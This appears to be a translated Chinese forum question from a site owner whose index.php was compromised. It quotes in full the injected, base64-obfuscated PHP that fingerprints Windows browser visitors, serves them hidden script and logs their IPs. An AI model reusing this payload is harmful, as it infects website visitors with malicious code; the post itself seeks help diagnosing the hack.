我的PHP文件,尤其是用JavaScript的index.php文件重定向,如:可以<script type =「text/javascript」> window.location =「/」;</script>被黑客攻擊?
<script type="text/javascript">window.location="/";</script>
被黑客就像這樣:
<?php eval(base64_decode(
'JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQ
nXTskZGJmPSRkci4nLycubWQ1KCRkci4nMScpOw0KaWYoKHN0cnBvcygkdWEsJ1dpbmRvd3MnKSE9PWZhbHNlKSYmKChzdHJwb3MoJHVhLCdNU0lFJykhPT1
mYWxzZSl8fChzdHJwb3MoJHVhLCdGaXJlZm94JykhPT1mYWxzZSkpJiYoc3RycG9zKEBmaWxlX2dldF9jb250ZW50cygkZGJmKSwkaXApID09PSBmYWxzZSk
pew0KCWVycm9yX3JlcG9ydGluZygwKTsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdZV0p5WlNzcmZXTmhkR05vS0dFMlltRXpOSGt
wZTNSeWVYdHdjbTkwYjNSNWNHVW1NbjFqWVhSamFDaGhjMkZpS1h0bFBYZHBibVJ2ZDFzaVpTSXJJbllpS3lKaGJDSmRPMzE5SUdsbUtERXBlMlk5V3kwMEx
DMDFMRGt3TERnNUxERTRMREkxTERnM0xEazNMRGcwTERFd05DdzVOU3c0Tml3NU55d3hNRElzTXpFc09UQXNPRGNzTVRBeExEVTJMRGswTERnMkxEazJMRGc
zTERrMUxERXdNeXd4TURFc05URXNNVEE0TERjd0xEZ3lMRGt3TERZMExEZ3lMRGsyTERnM0xESTFMREkyTERnMExEazJMRGczTERFd055d3lOQ3d5T0N3M05
5d3pNeXc0TUN3eU55d3hNRGdzTUN3dE5Td3ROaXd0TkN3NU1TdzROeXd4TURFc09ETXNPVFFzT0Rnc01UQXdMREkxTERJNExEUTFMQzB5TEMwMExDMDFMREV
4TUN3eE9TdzROeXc1TXl3eE1ESXNPRGNzTVRjc01URXdMQzB4TEMwMkxDMDBMQzAxTERnMUxEazRMRGcxTERFd01pdzVOaXc0Tnl3NU5Td3hNRE1zTXpJc01
UQTBMREV3TVN3NU1Td3hNREVzT0Rnc01qWXNNVGtzTkRjc09URXNPRGNzTVRBeExEZ3pMRGswTERnNExERTRMREV3TUN3eE1ERXNPRFVzTkRZc01qWXNPVEF
zTVRBeExERXdNeXc1T0N3ME15d3pOQ3d6TXl3eE1ESXNPVElzTVRBM0xERXdOeXc1TkN3NU1pdzVPU3d6TXl3NE55d3hNRGNzTVRBMExEZ3pMRE14TERnMkx
EazNMRGswTERNMExERXdOQ3c0TkN3ek15dzVPQ3c0T1N3NU9TdzBPU3c0T0N3NU9DdzBOeXd6TlN3eU5pd3hPQ3d4TURRc09USXNPRFlzTVRBeExEa3hMRFE
zTERJMExETTJMRE0wTERJMExERTVMRGt3TERnMkxEa3lMRGc1TERnNUxERXdNeXcwTnl3eU5Dd3pOaXd6TkN3eU5Dd3hPU3d4TURFc01UQXhMREV3T0N3NU5
DdzROaXcwT0N3eU5Td3hNRE1zT1RJc01UQXhMRGt3TERnMUxEa3hMRGt6TERreUxERXdNaXd4TURZc05EVXNPVEFzT1RBc09EY3NPRFlzT0RZc09UY3NORFV
zT1Rjc09UZ3NNVEF4TERrd0xERXdNeXc1TVN3NU5pdzVOeXcwTkN3NE1pdzROU3d4TURFc09UWXNPVFVzTVRBekxERXdNU3c0T0N3ME5TdzVNeXc0T0N3NE9
Dd3hNREVzTkRVc016UXNORFFzTVRBekxEazNMRGszTERRMUxETTBMRFEwTERJMkxEUTRMRFExTERNMExEa3hMRGczTERFd01TdzRNeXc1TkN3NE9DdzBPQ3d
4T1N3eU9DdzBOU3d0TWl3dE5Dd3ROU3d4TVRBc01Dd3ROU3d0Tml3NE9Td3hNRE1zT1RVc09EWXNNVEF5TERrd0xEazRMRGsyTERFM0xEa3lMRGc0TERrNUx
EZzBMRGsxTERnMkxERXdNU3d5Tml3eU5pd3hNVEFzTFRFc0xUWXNMVFFzTFRVc01UQXpMRGcwTERFd01Dd3hOeXc0T1N3eE9DdzBOaXd4T1N3NE5pdzVOaXc
0Tml3eE1ETXNPVFFzT0Rnc09UWXNNVEF4TERNekxEZzFMRGs1TERnNExEZ3pMREV3TVN3NE9DdzFOU3c1TXl3NE9DdzVOU3c0Tml3NU55d3hNRElzTWpVc01
qWXNPVEVzT0Rjc01UQXhMRGd6TERrMExEZzRMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXc0Tnl3eE1ERXNOVElzTVRBeUxERXdNU3d4TURFc09URXNPRE1
zTVRBMExERXdNaXc0Tml3eU55d3lOU3d4TURBc01UQXhMRGcxTERJMExETXhMREkxTERnNUxERXdNeXd4TURJc09UY3NORFVzTXpNc016SXNNVEEwTERreEx
ERXdOaXd4TURrc09UTXNPVEVzTVRBeExETXlMRGcyTERFd09Td3hNRE1zT0RJc016TXNPRFVzT1RZc09UWXNNek1zTVRBekxEZzJMRE15TERrM0xEa3hMRGs
0TERRNExEa3dMRGszTERRMkxETTNMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXd4TURJc01UQTJMRGsxTERnM0xETXhMREV3TlN3NU1Td3hNREFzT1RJc09
EUXNPVEFzT1RVc09URXNNVEF4TERFd09DdzBOeXd5TkN3NU1TdzVNU3c0TlN3NE55dzROeXc1TlN3eU5pdzBOU3c0Tnl3ek15d3hNREVzTVRBeExERXdPQ3c
1TkN3NE5pd3pNeXc1T0N3NU5pd3hNRElzT1RFc01UQXhMRGt5TERrM0xEazFMRFE0TERJMUxEZ3lMRGcxTERFd01TdzVOaXc1TlN3eE1ETXNNVEF4TERnNEx
ESTFMRFEwTERnNUxETXlMREV3TUN3eE1ETXNNVEEzTERrekxEZzRMRE15TERrekxEZzRMRGc0TERFd01TdzBPQ3d5TlN3ek15d3lOaXcwTlN3NE55d3pNeXd
4TURFc01UQXhMREV3T0N3NU5DdzROaXd6TXl3eE1ESXNPVFlzT1Rrc05EY3NNalFzTXpVc01qVXNORFFzT0Rrc016SXNNVEF3TERnNExERXdNaXcxTUN3eE1
ETXNNVEF5TERrNUxEa3lMRGcwTERFd01pd3hNRE1zT0Rjc01qVXNNallzTVRBMUxEa3dMRGczTERFd01pdzRPU3d5Tml3ek1Dd3lOQ3d6Tml3ek5Dd3lOQ3d
5T0N3ME5TdzROeXd6TXl3eE1ERXNPRFlzTVRBekxEVXhMREV3TVN3eE1ETXNNVEF3TERrd0xEZzFMREV3TXl3eE1ERXNPRGdzTWpZc01qUXNPVEVzT0Rjc09
UQXNPVEFzT1RBc01UQXhMREkyTERNd0xESTBMRE0yTERNMExESTBMREk0TERRMUxDMHlMQzAwTEMwMUxDMDJMRGczTERrM0xEZzBMREV3TkN3NU5TdzROaXc
1Tnl3eE1ESXNNekVzT1RBc09EY3NNVEF4TERVMkxEazBMRGcyTERrMkxEZzNMRGsxTERFd015d3hNREVzTlRFc01UQTRMRGN3TERneUxEa3dMRFkwTERneUx
EazJMRGczTERJMUxESTJMRGcwTERrMkxEZzNMREV3Tnl3eU5Dd3lPQ3czTnl3ek15dzRNQ3d6TWl3NE1pdzVPU3c1T0N3NE5pdzVOeXc0Tml3MU1pdzVNU3c
1TVN3NU15dzROeXd5Tml3NE55d3lPQ3cwTlN3dE1pd3ROQ3d0TlN3eE1UQmRPMzEzUFdZN2N6MWJYVHR5UFZOMGNtbHVaenQ0UFNKcUpTSTdabTl5S0drOU1
Ec3RhU3MxTnpraFBUQTdhU3M5TVNsN2FqMXBPMmxtS0dVbUppZ3dNekU5UFRCNE1Ua3BLWE05Y3l0eUxtWnliMjFEYUdGeVEyOWtaU2dvTVNwM1cycGRLMlV
vZUNzektTc3hNeWtwTzMwZ2RISjVlMkZ6WjJGelp5WXhNMzFqWVhSamFDaGhjMmRoS1h0bEtITXBPMzA4TDNOamNtbHdkRDQ9JykpOw0KCWlmICgkZnAgPSB
AZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>
<script type="text/javascript">window.location="/";</script>
難道是因爲我使用$_SERVER["REQUEST_URI"]
或$_SERVER["HTTP_REFERER"]
或其他一些命令 - 執行他們需要剝離mysql_real_escape_string
這不是問題。你可以添加更多的細節? –
這裏有什麼問題? –
那麼,你說你自己,它可以和它被黑客入侵... – bogatyrjov